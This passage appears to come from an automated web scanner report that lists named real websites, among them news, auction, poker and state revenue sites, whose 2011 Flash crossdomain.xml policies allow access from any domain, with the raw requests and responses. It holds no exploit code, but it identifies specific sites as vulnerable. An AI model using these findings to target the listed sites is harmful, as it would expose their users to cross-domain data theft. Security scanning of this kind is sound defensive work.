Date: Mon, 02 May 2011 00:28:23 GMT
Server: Apache
Last-Modified: Tue, 01 Mar 2011 01:30:36 GMT
ETag: "23102f-111-49d61be3e8700"
Accept-Ranges: bytes
Content-Length: 273
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" secure="false"/>
   <allow-h
...[SNIP]...

8.42. http://www.banner.kiev.ua/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.banner.kiev.ua
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.banner.kiev.ua

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sun, 01 May 2011 23:16:20 GMT
Content-Type: text/xml; charset=utf8
Content-Length: 203
Last-Modified: Fri, 28 Nov 2008 12:59:15 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

8.43. http://www.bigrebelgames.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bigrebelgames.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bigrebelgames.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:25:58 GMT
Server: Apache
Last-Modified: Thu, 08 Apr 2010 15:07:04 GMT
ETag: "10a-4bbdf118"
Accept-Ranges: bytes
Content-Length: 266
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<!-- http://www.youtube.com/crossdomain.xml -->
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

8.44. http://www.bonhams.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bonhams.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bonhams.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:16:31 GMT
Server: Apache
Last-Modified: Wed, 24 Feb 2010 15:57:30 GMT
ETag: "29fd-ca-4805ab93c6e80"
Accept-Ranges: bytes
Content-Length: 202
Vary: Accept-Encoding
Content-Type: text/xml
Expires: Sun, 01 May 2011 23:31:31 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

8.45. http://www.cbs8.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbs8.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cbs8.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
WN: IIS29
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/xml
Last-Modified: Thu, 06 Nov 2008 15:03:45 GMT
ETag: "1f1e5ddd2040c91:ac8"
Cteonnt-Length: 208
Expires: Mon, 02 May 2011 00:40:25 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Mon, 02 May 2011 00:40:25 GMT
Content-Length: 208
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

8.46. http://www.express.co.uk/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.express.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.express.co.uk

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:30:44 GMT
Server: Apache
Last-Modified: Mon, 27 Apr 2009 17:01:16 GMT
ETag: "641b0-1ff-4688c4b5def00"
Accept-Ranges: bytes
Content-Length: 511
MS-Author-Via: DAV
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.netro42.com" />
<allow-access-from domain="*.netro42.net" />
<allow-access-from domain="*.dailyexpress.co.uk" />
<allow-access-from domain="*.express.co.uk" />
<allow-access-from domain="*.scottishdailyexpress.co.uk" />
<allow-access-from domain="*express.co.uk" />
<allow-access-from domain="*" />
...[SNIP]...

8.47. http://www.foxytube.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxytube.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.foxytube.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:26:42 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
Last-Modified: Fri, 04 Dec 2009 19:53:36 GMT
ETag: "2e008f1-92-479ec769bb000"
Accept-Ranges: bytes
Content-Length: 146
Connection: close
Content-Type: application/xml
Set-Cookie: RNLBSERVERID=ded691; path=/
Cache-control: private

<?xml version="1.0"?>
<!-- http://www.foo.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

8.48. http://www.freemooviesonline.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.freemooviesonline.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.freemooviesonline.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:55:38 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.13
Last-Modified: Thu, 03 Jun 2010 12:56:46 GMT
ETag: "314040-cb-4881fbd2c3f80"
Accept-Ranges: bytes
Content-Length: 203
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

8.49. http://www.fulltiltpoker.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulltiltpoker.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.fulltiltpoker.net

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:32:44 GMT
Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g
Last-Modified: Thu, 20 Jan 2011 11:11:28 GMT
Accept-Ranges: bytes
Content-Length: 77
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

8.50. http://www.goodtoknow.co.uk/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.goodtoknow.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.goodtoknow.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 14 Apr 2011 08:28:48 GMT
ETag: "1c90d62-71-4a0dcb6dc9000"
Accept-Ranges: bytes
Content-Length: 113
Content-Type: text/xml
Date: Mon, 02 May 2011 00:18:20 GMT
Connection: close
Set-Cookie: browsertype=web; expires=Tue, 03-May-2011 00:18:20 GMT; path=/; domain=.goodtoknow.co.uk

...<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>


8.51. http://www.healthination.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.healthination.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.healthination.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sun, 01 May 2011 23:56:04 GMT
Content-Type: text/xml
Connection: close
Last-Modified: Tue, 17 Feb 2009 16:22:47 GMT
Content-Length: 221
Cache-Control: max-age=4200
Expires: Mon, 02 May 2011 01:06:04 GMT
Accept-Ranges: bytes

<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*"/>
<
...[SNIP]...

8.52. http://www.hyperlaunch.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hyperlaunch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hyperlaunch.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:52:10 GMT
Server: Apache/2.0.52 (CentOS)
Last-Modified: Thu, 04 Dec 2008 13:37:45 GMT
ETag: "a70756-d8-aa62dc40"
Accept-Ranges: bytes
Content-Length: 216
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross
...[SNIP]...

8.53. http://www.jacksonnewspapers.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jacksonnewspapers.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.jacksonnewspapers.com

Response

HTTP/1.0 200 OK
Date: Sun, 01 May 2011 23:16:27 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
Content-Length: 200
Content-Type: text/html;charset=utf-8
X-Cache: MISS from parent3.ghm.zope.net
X-Cache: MISS from cache5.ghm.zope.net
Via: 1.0 parent3.ghm.zope.net:80 (squid/2.7.STABLE9), 1.0 cache5.ghm.zope.net:80 (squid)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

8.54. http://www.journalstandard.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.journalstandard.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.journalstandard.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:41:51 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
Content-Length: 200
Content-Type: text/html;charset=utf-8
Age: 1173
X-Cache: HIT from parent3.ghm.zope.net
X-Cache: MISS from cache7.ghm.zope.net
Via: 1.0 parent3.ghm.zope.net:80 (squid/2.7.STABLE9), 1.0 cache7.ghm.zope.net:80 (squid)
Vary: Accept-Encoding
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

8.55. http://www.ksrevenue.org/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ksrevenue.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ksrevenue.org

Response

HTTP/1.1 200 OK
Content-Length: 230
Content-Type: text/xml
Last-Modified: Fri, 04 Feb 2011 19:33:26 GMT
Accept-Ranges: bytes
ETag: "9b9ec65a2c4cb1:2206"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:21:5